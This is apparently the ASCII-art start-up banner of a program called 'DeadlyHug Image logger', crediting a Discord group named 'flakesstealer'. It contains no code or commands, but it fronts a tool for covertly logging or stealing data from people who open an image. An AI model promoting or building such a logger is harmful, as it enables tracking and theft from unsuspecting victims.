


[[white]]                                   ▓█████▄ ▓█████ ▄▄▄      ▓█████▄  ██▓   ▓██   ██▓    ██░ ██  █    ██   ▄████ 
[[white]]                                   ▒██▀ ██▌▓█   ▀▒████▄    ▒██▀ ██▌▓██▒    ▒██  ██▒   ▓██░ ██▒ ██  ▓██▒ ██▒ ▀█▒
[[white]]                                   ░██   █▌▒███  ▒██  ▀█▄  ░██   █▌▒██░     ▒██ ██░   ▒██▀▀██░▓██  ▒██░▒██░▄▄▄░
[[white]]                                   ░▓█▄   ▌▒▓█  ▄░██▄▄▄▄██ ░▓█▄   ▌▒██░     ░ ▐██▓░   ░▓█ ░██ ▓▓█  ░██░░▓█  ██▓
[[white]]                                   ░▒████▓ ░▒████▒▓█   ▓██▒░▒████▓ ░██████▒ ░ ██▒▓░   ░▓█▒░██▓▒▒█████▓ ░▒▓███▀▒
[[white]]                                   ▒▒▓  ▒ ░░ ▒░ ░▒▒   ▓▒█░ ▒▒▓  ▒ ░ ▒░▓  ░  ██▒▒▒     ▒ ░░▒░▒░▒▓▒ ▒ ▒  ░▒   ▒ 
[[white]]                                   ░ ▒  ▒  ░ ░  ░ ▒   ▒▒ ░ ░ ▒  ▒ ░ ░ ▒  ░▓██ ░▒░     ▒ ░▒░ ░░░▒░ ░ ░   ░   ░ 
[[white]]                                   ░ ░  ░    ░    ░   ▒    ░ ░  ░   ░ ░   ▒ ▒ ░░      ░  ░░ ░ ░░░ ░ ░ ░ ░   ░ 
[[white]]                                   ░       ░  ░     ░  ░   ░        ░  ░░ ░         ░  ░  ░   ░           ░ 
 [[white]]                                  ░                       ░              ░ ░                                 

                          
                                          [[red]]███████████████████████████████████████████████████████████████	
                                             
                                                                   
                                 [[white]][[[red]]  $ [[white]]] Credits ; .gg/flakesstealer , DeadlyHug
                                                                    
                                 [[white]][[[red]] $ [[white]]] Program ; DeadlyHug Image logger


